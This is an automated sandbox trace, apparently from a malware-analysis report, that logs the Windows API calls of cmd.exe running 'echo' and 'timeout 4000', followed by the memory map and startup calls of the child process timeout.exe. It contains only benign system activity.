[0085.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1efa60 | out: lpConsoleScreenBufferInfo=0x1efa60) returned 1
[0085.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0085.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1efa2c | out: lpConsoleScreenBufferInfo=0x1efa2c) returned 1
[0085.580] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1efa44 | out: lpNumberOfAttrsWritten=0x1efa44) returned 1
[0085.580] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0085.580] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75370000
[0085.580] GetProcAddress (hModule=0x75370000, lpProcName="CopyFileExW") returned 0x753aac6c
[0085.580] GetProcAddress (hModule=0x75370000, lpProcName="IsDebuggerPresent") returned 0x753b3ea8
[0085.580] GetProcAddress (hModule=0x75370000, lpProcName="SetConsoleInputExeNameW") returned 0x753c2732
[0085.582] GetEnvironmentVariableW (in: lpName="time", lpBuffer=0x4a750640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0085.582] _wcsicmp (_String1="time", _String2="CD") returned 17
[0085.582] _wcsicmp (_String1="time", _String2="ERRORLEVEL") returned 15
[0085.582] _wcsicmp (_String1="time", _String2="CMDEXTVERSION") returned 17
[0085.582] _wcsicmp (_String1="time", _String2="CMDCMDLINE") returned 17
[0085.582] _wcsicmp (_String1="time", _String2="DATE") returned 16
[0085.582] _wcsicmp (_String1="time", _String2="TIME") returned 0
[0085.582] GetSystemTime (in: lpSystemTime=0x1ef834 | out: lpSystemTime=0x1ef834*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x1, wDay=0x16, wHour=0x5, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x2b9))
[0085.582] SystemTimeToFileTime (in: lpSystemTime=0x1ef834, lpFileTime=0x1ef828 | out: lpFileTime=0x1ef828) returned 1
[0085.582] FileTimeToLocalFileTime (in: lpFileTime=0x1ef828, lpLocalFileTime=0x1ef820 | out: lpLocalFileTime=0x1ef820) returned 1
[0085.582] FileTimeToSystemTime (in: lpFileTime=0x1ef820, lpSystemTime=0x1ef834 | out: lpSystemTime=0x1ef834) returned 1
[0085.582] _vsnwprintf (in: _Buffer=0x4a750640, _BufferCount=0x1fff, _Format="%2d%s%02d%s%02d%s%02d", _ArgList=0x1ef7fc | out: _Buffer=" 3:27:13.69") returned 11
[0085.583] _wcsicmp (_String1="echo", _String2=")") returned 60
[0085.583] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0085.583] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0085.583] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0085.583] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0085.583] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0085.583] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0085.585] _wcsicmp (_String1="FOR", _String2="timeout") returned -14
[0085.585] _wcsicmp (_String1="FOR/?", _String2="timeout") returned -14
[0085.585] _wcsicmp (_String1="IF", _String2="timeout") returned -11
[0085.585] _wcsicmp (_String1="IF/?", _String2="timeout") returned -11
[0085.585] _wcsicmp (_String1="REM", _String2="timeout") returned -2
[0085.585] _wcsicmp (_String1="REM/?", _String2="timeout") returned -2
[0085.587] _wcsicmp (_String1="FOR", _String2="exit") returned 1
[0085.587] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1
[0085.587] _wcsicmp (_String1="IF", _String2="exit") returned 4
[0085.587] _wcsicmp (_String1="IF/?", _String2="exit") returned 4
[0085.587] _wcsicmp (_String1="REM", _String2="exit") returned 13
[0085.587] _wcsicmp (_String1="REM/?", _String2="exit") returned 13
[0085.588] GetConsoleTitleW (in: lpConsoleTitle=0x1ef5dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0085.588] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0085.588] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0085.588] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0085.588] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0085.588] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0085.588] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0085.589] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0085.589] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0085.589] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0085.589] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0085.590] GetConsoleTitleW (in: lpConsoleTitle=0x2606a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0085.591] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe - echo 3:27:13.69 ") returned 1
[0085.591] _vsnwprintf (in: _Buffer=0x4a754640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef5a4 | out: _Buffer=" 3:27:13.69 \r\n") returned 14
[0085.592] _get_osfhandle (_FileHandle=1) returned 0x7
[0085.592] GetFileType (hFile=0x7) returned 0x2
[0085.592] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0085.592] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef564 | out: lpMode=0x1ef564) returned 1
[0085.592] _get_osfhandle (_FileHandle=1) returned 0x7
[0085.592] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a754640*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x1ef590, lpReserved=0x0 | out: lpBuffer=0x4a754640*, lpNumberOfCharsWritten=0x1ef590*=0xe) returned 1
[0085.592] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 1
[0085.593] _get_osfhandle (_FileHandle=1) returned 0x7
[0085.593] _get_osfhandle (_FileHandle=1) returned 0x7
[0085.593] _get_osfhandle (_FileHandle=1) returned 0x7
[0085.593] GetFileType (hFile=0x7) returned 0x2
[0085.593] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0085.593] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef778 | out: lpMode=0x1ef778) returned 1
[0085.593] _dup (_FileHandle=1) returned 3
[0085.594] _close (_FileHandle=1) returned 0
[0085.594] _wcsicmp (_String1="NUL", _String2="con") returned 11
[0085.594] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef748, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c
[0085.594] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1
[0085.594] GetConsoleTitleW (in: lpConsoleTitle=0x1ef578, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0085.595] _wcsicmp (_String1="timeout", _String2="DIR") returned 16
[0085.595] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15
[0085.595] _wcsicmp (_String1="timeout", _String2="DEL") returned 16
[0085.595] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16
[0085.595] _wcsicmp (_String1="timeout", _String2="COPY") returned 17
[0085.595] _wcsicmp (_String1="timeout", _String2="CD") returned 17
[0085.595] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17
[0085.595] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2
[0085.595] _wcsicmp (_String1="timeout", _String2="REN") returned 2
[0085.595] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15
[0085.595] _wcsicmp (_String1="timeout", _String2="SET") returned 1
[0085.595] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4
[0085.595] _wcsicmp (_String1="timeout", _String2="DATE") returned 16
[0085.595] _wcsicmp (_String1="timeout", _String2="TIME") returned 111
[0085.595] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4
[0085.595] _wcsicmp (_String1="timeout", _String2="MD") returned 7
[0085.595] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7
[0085.595] _wcsicmp (_String1="timeout", _String2="RD") returned 2
[0085.595] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2
[0085.595] _wcsicmp (_String1="timeout", _String2="PATH") returned 4
[0085.595] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13
[0085.595] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1
[0085.595] _wcsicmp (_String1="timeout", _String2="CLS") returned 17
[0085.596] _wcsicmp (_String1="timeout", _String2="CALL") returned 17
[0085.596] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2
[0085.596] _wcsicmp (_String1="timeout", _String2="VER") returned -2
[0085.596] _wcsicmp (_String1="timeout", _String2="VOL") returned -2
[0085.596] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15
[0085.596] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1
[0085.596] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15
[0085.596] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7
[0085.596] _wcsicmp (_String1="timeout", _String2="START") returned 1
[0085.596] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16
[0085.596] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9
[0085.596] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7
[0085.596] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4
[0085.596] _wcsicmp (_String1="timeout", _String2="POPD") returned 4
[0085.596] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19
[0085.596] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14
[0085.596] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18
[0085.596] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17
[0085.596] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7
[0085.596] _wcsicmp (_String1="timeout", _String2="DIR") returned 16
[0085.596] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15
[0085.596] _wcsicmp (_String1="timeout", _String2="DEL") returned 16
[0085.596] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16
[0085.596] _wcsicmp (_String1="timeout", _String2="COPY") returned 17
[0085.596] _wcsicmp (_String1="timeout", _String2="CD") returned 17
[0085.596] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17
[0085.596] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2
[0085.596] _wcsicmp (_String1="timeout", _String2="REN") returned 2
[0085.596] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15
[0085.596] _wcsicmp (_String1="timeout", _String2="SET") returned 1
[0085.597] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4
[0085.597] _wcsicmp (_String1="timeout", _String2="DATE") returned 16
[0085.597] _wcsicmp (_String1="timeout", _String2="TIME") returned 111
[0085.597] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4
[0085.597] _wcsicmp (_String1="timeout", _String2="MD") returned 7
[0085.597] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7
[0085.597] _wcsicmp (_String1="timeout", _String2="RD") returned 2
[0085.597] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2
[0085.597] _wcsicmp (_String1="timeout", _String2="PATH") returned 4
[0085.597] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13
[0085.597] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1
[0085.597] _wcsicmp (_String1="timeout", _String2="CLS") returned 17
[0085.597] _wcsicmp (_String1="timeout", _String2="CALL") returned 17
[0085.597] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2
[0085.597] _wcsicmp (_String1="timeout", _String2="VER") returned -2
[0085.597] _wcsicmp (_String1="timeout", _String2="VOL") returned -2
[0085.597] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15
[0085.597] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1
[0085.597] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15
[0085.597] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7
[0085.597] _wcsicmp (_String1="timeout", _String2="START") returned 1
[0085.597] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16
[0085.597] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9
[0085.597] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7
[0085.597] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4
[0085.597] _wcsicmp (_String1="timeout", _String2="POPD") returned 4
[0085.597] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19
[0085.597] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14
[0085.597] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18
[0085.597] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17
[0085.597] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7
[0085.598] _wcsicmp (_String1="timeout", _String2="FOR") returned 14
[0085.598] _wcsicmp (_String1="timeout", _String2="IF") returned 11
[0085.598] _wcsicmp (_String1="timeout", _String2="REM") returned 2
[0085.598] _wcsnicmp (_String1="time", _String2="cmd ", _MaxCount=0x4) returned 17
[0085.598] SetErrorMode (uMode=0x0) returned 0x0
[0085.598] SetErrorMode (uMode=0x1) returned 0x0
[0085.599] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x261b58, lpFilePart=0x1ef098 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef098*="system32") returned 0x13
[0085.599] SetErrorMode (uMode=0x0) returned 0x1
[0085.599] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a750640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
[0085.599] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0085.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.*", fInfoLevelId=0x1, lpFindFileData=0x1eee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eee14) returned 0x261e28
[0085.605] FindClose (in: hFindFile=0x261e28 | out: hFindFile=0x261e28) returned 1
[0085.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.COM", fInfoLevelId=0x1, lpFindFileData=0x1eee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eee14) returned 0xffffffff
[0085.606] GetLastError () returned 0x2
[0085.606] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.EXE", fInfoLevelId=0x1, lpFindFileData=0x1eee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eee14) returned 0x261e28
[0085.606] FindClose (in: hFindFile=0x261e28 | out: hFindFile=0x261e28) returned 1
[0085.606] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0085.606] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0085.606] GetConsoleTitleW (in: lpConsoleTitle=0x1ef30c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0085.606] GetConsoleTitleW (in: lpConsoleTitle=0x261e80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0085.607] SetConsoleTitleW (lpConsoleTitle="timeout 4000 ") returned 1
[0085.607] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef194, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef25c | out: lpAttributeList=0x1ef194, lpSize=0x1ef25c) returned 1
[0085.607] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef194, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef254, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef194, lpPreviousValue=0x0) returned 1
[0085.607] GetStartupInfoW (in: lpStartupInfo=0x1ef150 | out: lpStartupInfo=0x1ef150*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x80000000, hStdOutput=0x261e70, hStdError=0x1ef280))
Process:
id = "27"
image_name = "timeout.exe"
filename = "c:\\windows\\system32\\timeout.exe"
page_root = "0x7f1be660"
os_pid = "0xf40"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "26"
os_parent_pid = "0xf24"
cmd_line = "timeout 4000 "
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2368
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2369
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2370
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2371
start_va = 0x180000
end_va = 0x189fff
entry_point = 0x180000
region_type = mapped_file
name = "timeout.exe"
filename = "\\Windows\\System32\\timeout.exe" (normalized: "c:\\windows\\system32\\timeout.exe")
Region:
id = 2372
start_va = 0x250000
end_va = 0x28ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2373
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2374
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2375
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2376
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 2377
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2378
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2379
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2380
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2381
start_va = 0x2f0000
end_va = 0x3effff
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 2382
start_va = 0x550000
end_va = 0x55ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 2383
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2384
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2385
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2386
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2387
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2388
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2389
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2390
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2391
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2392
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2393
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2394
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2395
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2396
start_va = 0x3f0000
end_va = 0x4b7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 2397
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2398
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2399
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 2400
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2401
start_va = 0xe0000
end_va = 0xe1fff
entry_point = 0xe0000
region_type = mapped_file
name = "timeout.exe.mui"
filename = "\\Windows\\System32\\en-US\\timeout.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\timeout.exe.mui")
Region:
id = 2402
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2403
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 2404
start_va = 0x560000
end_va = 0x660fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 2405
start_va = 0x670000
end_va = 0x126ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000670000"
filename = ""
Region:
id = 2406
start_va = 0x1270000
end_va = 0x153efff
entry_point = 0x1270000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 222
os_tid = 0xf44
[0085.850] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe64 | out: lpSystemTimeAsFileTime=0x28fe64*(dwLowDateTime=0xe3aaffb0, dwHighDateTime=0x1d469c7))
[0085.850] GetCurrentProcessId () returned 0xf40
[0085.850] GetCurrentThreadId () returned 0xf44
[0085.850] GetTickCount () returned 0x2340a
[0085.850] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe5c | out: lpPerformanceCount=0x28fe5c*=1815979500000) returned 1
[0085.850] GetModuleHandleA (lpModuleName=0x0) returned 0x180000
[0085.851] __set_app_type (_Type=0x1)
[0085.851] __p__fmode () returned 0x757a31f4
[0085.851] __p__commode () returned 0x757a31fc
[0085.851] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1857c5) returned 0x0
[0085.851] __wgetmainargs (in: _Argc=0x187140, _Argv=0x187148, _Env=0x187144, _DoWildCard=0, _StartInfo=0x187154 | out: _Argc=0x187140, _Argv=0x187148, _Env=0x187144) returned 0
[0085.852] SetThreadUILanguage (LangId=0x0) returned 0x409
[0085.852] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0085.852] SetLastError (dwErrCode=0x0)
[0085.852] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0085.852] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0085.852] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0085.852] VerifyVersionInfoW (in: lpVersionInformation=0x28f6dc, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x28f6dc) returned 1
[0085.852] lstrlenW (lpString="") returned 0
[0085.853] SetThreadUILanguage (LangId=0x0) returned 0x409
[0085.853] SetLastError (dwErrCode=0x0)
[0085.854] _memicmp (_Buf1=0x2ff1f8, _Buf2=0x1811e8, _Size=0x7) returned 0
[0085.854] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\timeout.exe" (normalized: "c:\\windows\\system32\\timeout.exe")) returned 0x1f
[0085.854] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\timeout.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x76c
[0085.854] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\timeout.exe", dwHandle=0x0, dwLen=0x776, lpData=0x301e10 | out: lpData=0x301e10) returned 1
[0085.854] VerQueryValueW (in: pBlock=0x301e10, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28f7e4, puLen=0x28f7e8 | out: lplpBuffer=0x28f7e4*=0x3021c0, puLen=0x28f7e8) returned 1
[0085.856] _memicmp (_Buf1=0x2ff1f8, _Buf2=0x1811e8, _Size=0x7) returned 0
[0085.856] _vsnwprintf (in: _Buffer=0x301c00, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x28f7cc | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0085.856] VerQueryValueW (in: pBlock=0x301e10, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x28f7f4, puLen=0x28f7f0 | out: lplpBuffer=0x28f7f4*=0x301ff0, puLen=0x28f7f0) returned 1
[0085.856] lstrlenW (lpString="timeout.exe") returned 11
[0085.856] lstrlenW (lpString="timeout.exe") returned 11
[0085.856] lstrlenW (lpString=".EXE") returned 4
[0085.856] StrStrIW (lpFirst="timeout.exe", lpSrch=".EXE") returned=".exe"
[0085.857] lstrlenW (lpString="timeout.exe") returned 11
[0085.857] lstrlenW (lpString=".EXE") returned 4
[0085.857] _memicmp (_Buf1=0x2ff1f8, _Buf2=0x1811e8, _Size=0x7) returned 0
[0085.857] lstrlenW (lpString="timeout") returned 7
[0085.857] _memicmp (_Buf1=0x2ff210, _Buf2=0x1811e8, _Size=0x7) returned 0
[0085.858] _memicmp (_Buf1=0x2ff228, _Buf2=0x1811e8, _Size=0x7) returned 0
[0085.858] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x3028c0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0085.858] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
